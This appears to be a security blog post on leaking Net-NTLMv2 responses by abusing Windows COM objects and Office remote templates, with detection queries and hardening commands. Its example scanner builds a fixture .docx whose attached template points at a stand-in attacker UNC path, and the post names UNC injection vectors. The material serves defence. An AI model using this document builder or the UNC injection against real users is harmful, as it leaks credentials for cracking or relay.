
Researchers have described how attackers can abuse Windows COM objects and auto-execution paths to silently leak NTLMv2 authentication material (Net-NTLMv2 challenge-responses, which can be cracked offline or relayed) without requiring exotic payloads. Because the technique rides on trusted system components, it is hard to tell from legitimate activity.
You Should Know:
How the Exploit Works
Attackers abuse COM objects and Windows auto-execution mechanisms (resources that Windows or Office resolves automatically when a file is opened or rendered) to make the victim's machine authenticate to an attacker-controlled SMB or WebDAV server. The client answers the server's challenge with a Net-NTLMv2 response, which the attacker captures. Common delivery vectors:
– Malicious Office documents (for example, a document whose attached template lives on a remote host)
– Scripts that instantiate COM objects which in turn open a remote path
– UNC path injection (\\attacker-host\share\...) into any field that Windows resolves on its own
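The following Python scanner is an added example, not code from the original post. It shows how the "malicious Office document" and "UNC path injection" vectors above fit together: an Office Open XML file is a ZIP whose .rels parts may declare relationships with TargetMode="External"; when such a target is a UNC path, a file:// URL with a host, or an http(s):// URL, Word resolves it on open and the client authenticates to that host. The sample .docx is constructed in memory as a fixture (the attacker host 10.0.0.5 is made up), and the remote-target heuristic is this example's own, not a Microsoft specification.

```python
"""Added example for this page (not code from the original post): scan an Office
Open XML file for external relationship targets that would make Office reach out
to a remote host, and therefore send a Net-NTLMv2 response, when it is opened.

The sample .docx below is constructed in memory as a test fixture; the remote-
target heuristic is this example's own, not a Microsoft specification."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Targets that resolve to another host: UNC paths (\\host\share\...), file:// URLs
# with a host component, and http(s):// URLs (WebDAV fallback can still trigger
# NTLM). Relative targets such as "Normal.dotm" and file:///C:/... are not remote.
REMOTE_TARGET = re.compile(r"^(\\\\[^\\]+\\|file://[^/]+/|https?://)", re.IGNORECASE)


def find_remote_relationships(doc_bytes: bytes) -> list:
    """Return every TargetMode="External" relationship whose target is remote."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    hits.append({
                        "part": name,
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return hits


def build_sample_docx(template_target: str = "") -> bytes:
    """Construct a minimal .docx (constructed fixture, not a real Word file).

    When template_target is non-empty, word/settings.xml declares an attached
    template whose relationship points at that external target: the layout used
    by remote template injection."""
    def rels(body):
        return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{body}</Relationships>'

    parts = {
        "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "_rels/.rels": rels(f'<Relationship Id="rId1" Type="{R_NS}/officeDocument" Target="word/document.xml"/>'),
        "word/document.xml": f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>',
        "word/_rels/document.xml.rels": rels(f'<Relationship Id="rId1" Type="{R_NS}/settings" Target="settings.xml"/>'),
        "word/settings.xml": f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}"/>',
    }
    if template_target:
        parts["word/settings.xml"] = (
            f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:attachedTemplate r:id="rId1"/></w:settings>')
        parts["word/_rels/settings.xml.rels"] = rels(
            f'<Relationship Id="rId1" Type="{R_NS}/attachedTemplate" '
            f'Target="{template_target}" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed attacker host and share; any UNC target behaves the same way.
    for label, doc in (("benign", build_sample_docx()),
                       ("unc", build_sample_docx(r"\\10.0.0.5\share\t.dotx"))):
        print(label, find_remote_relationships(doc) or "no remote targets")
```

Run it against real attachments by passing the file's bytes to find_remote_relationships; a non-empty result from settings.xml.rels (attachedTemplate) or document.xml.rels (hyperlink, image, oleObject) is the indicator to triage. Relative and local targets are deliberately ignored, because a template path like Normal.dotm never leaves the host.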
Detection & Mitigation
KQL Query for Defender XDR
// DLL loads appear in DeviceImageLoadEvents; comsvcs.dll is never a process FileName in DeviceProcessEvents
DeviceImageLoadEvents
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe") and FileName =~ "comsvcs.dll"
| project Timestamp, DeviceName, AccountName = InitiatingProcessAccountName, InitiatingProcessFileName, FileName, ProcessCommandLine = InitiatingProcessCommandLine
| union (DeviceProcessEvents
    | where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe") and ProcessCommandLine has "CoGetObject"
    | project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine)
This is a broad hunting query, not a tuned alert: legitimate administrative scripts load comsvcs.dll too, so baseline the results per device before turning it into a detection rule.
Windows Security Hardening
1. Refuse LM and NTLMv1 (LmCompatibilityLevel 5 = send NTLMv2 responses only, refuse LM and NTLM):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5 -Type DWord
2. Block outbound NTLM (RestrictSendingNTLMTraffic 2 = Deny all). Deploy with value 1 (Audit all) first and review events 8001-8004 in the Microsoft-Windows-NTLM/Operational log, then add any servers that still need NTLM to ClientAllowedNTLMServers before switching to 2:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 2 -Type DWord
3. Disable DCOM (the command below turns DCOM off machine-wide rather than auditing COM access; it breaks remote WMI, DCOM-based management tools and some applications, so test before deploying):
reg add "HKLM\SOFTWARE\Microsoft\Ole" /v "EnableDCOM" /t REG_SZ /d "N" /f
Linux-Based Monitoring (If Using Samba/Winbind)
sudo auditctl -w /var/lib/samba/ -k samba_ntlm
sudo ausearch -k samba_ntlm | grep NTLM
The audit watch records file access to Samba's state directory, not authentication attempts. For NTLM authentication logging, raise Samba's auth_audit log class (for example `log level = 1 auth_audit:3` in smb.conf) and review the Samba logs instead.
What Undercode Says
This attack highlights the risks of legacy authentication protocols like NTLM. While disabling NTLM entirely is ideal, organizations must balance security with compatibility. Implementing strict NTLM policies, monitoring COM object usage, and leveraging KQL-based detections can mitigate risks.
Expected Output:
- Detection of suspicious COM-related activity from script hosts (the KQL query detects; it does not block)
- Outbound NTLM blocked by the RestrictSendingNTLMTraffic policy, with events 8001-8004 in the Microsoft-Windows-NTLM/Operational log
- Logon events in the Windows Security log on servers that receive NTLM (Event ID 4624 with Authentication Package NTLM; 4648 for explicit-credential logons)
Prediction
As attackers increasingly abuse trusted Windows components, Microsoft may enforce stricter default NTLM policies in future updates, pushing enterprises toward Kerberos-only authentication.
Reported By: 0x534c Cybersecurity – Hackers Feeds